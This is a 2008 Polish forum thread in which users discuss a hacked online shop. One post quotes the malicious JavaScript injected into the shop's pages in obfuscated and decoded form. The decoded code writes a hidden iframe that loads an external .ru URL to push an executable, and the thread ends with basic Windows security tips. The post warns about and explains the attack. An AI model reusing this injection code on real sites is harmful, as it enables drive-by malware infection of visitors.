ďťż
wirusy na defenie?



Tomasz Dolata - Pią Mar 21, 2008 7:12 pm
" />http://img159.imageshack.us/img159/8521/defenaap8.png ; o?



Michał Abramowicz - Sob Mar 22, 2008 6:57 pm
" />Dokładnie tak!

"www. defena. pl/ sklep" (specjalnie tak pisze)
ktoś im się włamał do ichniego sklepu (pewnie luka w ich sofcie) i dopisał
na dole coś złego w JavaScript, w wyniku czego łąduje się jakiś exek z ruskiego
serwera :-)

eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%32%66%66%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%39%30%34%29%2b%27%66%61%30%63%64%65%32%33%5c%27%20%77%69%64%74%68%3d%35%31%39%20%68%65%69%67%68%74%3d%34%31%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));

po zdekodowaniu ciągu jest co następuje:

window.status='Done';document.write('<iframe name=2ff src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*215904)+'fa0cde23\' width=519 height=416 style=\'display: none\'></iframe>')

czyli w ramce wywołuje urla, i tam próbuje serwer za pomocą kolejnego js załadować hdip.exe czy jakoś, i pewnie IE ;-) leży i kwiczy ;)

polecam mozille firefox z dodatkiem NoScript :-) czyli blokujemy JavaScript

:-)
ps: na platformie innej niż windows :-) babol nie jest groźny :-) z założenia :-)


Piotr Krzyżanowski - Sob Mar 22, 2008 7:19 pm
" />
">ps: na platformie innej niż windows babol nie jest groźny z założenia

wirusy na Leosia to tylko kwestia czasu


Marek Byrczak - Sob Mar 22, 2008 7:21 pm
" />Taaa Piotrek, coś ta chwila długo trwa

Ja od kiedy mam w zapasie Linuxa zainstalowanego, o żaden internetowy syf się nie martwię



Michał Abramowicz - Sob Mar 22, 2008 7:23 pm
" />
">ps: na platformie innej niż windows :-) babol nie jest groźny :-) z założenia :-)

wirusy na Leosia to tylko kwestia czasu :wink:
Leoco ? Potocznie wołam lajnuz ;-) (chyba że leopard od appla)

Btw, schodzimy na wątek inny i dość ideowy, dla użytkowników windows
polecam:
- nie pracować z prawami administratora
- mieć ntfs
- aktualizować
- jakieś prg antywirusowe
- używać opery albo firefox'a ;-)

A kwestją czasu jest to że standardowy user lajnuza ;-) 2x pomyśli zanim
bezmyślnie kliknie w linka ;-)

Pozdrawiam świątecznie!
Powered by WordPress, ©